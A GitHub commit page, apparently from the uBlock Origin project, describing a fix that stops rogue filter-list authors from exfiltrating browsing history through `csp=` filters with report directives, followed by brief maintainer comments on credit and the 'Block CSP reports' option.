Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Fix potential exfiltration of browsing history by a rogue list author…
… through `csp=` As reported internally to ubo-security by https://github.com/distinctmondaylila One issue is a regression from the rewriting of the static filtering parser in version 1.47.0, specifically the following commit: 8ea3b0f64c The existing regex was no longer suitable to properly detect some usage of `report-xxx` in the rwritten parser. Another issue which predates 1.47.0 is that the regex used for validation was case-sensititive, while the `report-uri` directive can be written using uppercase letters, i.e. `Report-uri`.
- Loading branch information
db5656f
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
My mistake, the proper GitHub link for the contributor who discovered and reported the issue through email is:
https://github.com/distinctmondaylilac
db5656f
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@gorhill the "Block CSP reports" option was preventing this?
db5656f
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yes, but it's not enabled by default in Chromium-based browsers.
db5656f
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Sounds like this was actually happening -- I am not aware that this was ever the case. "would have prevented these reports" would be more accurate.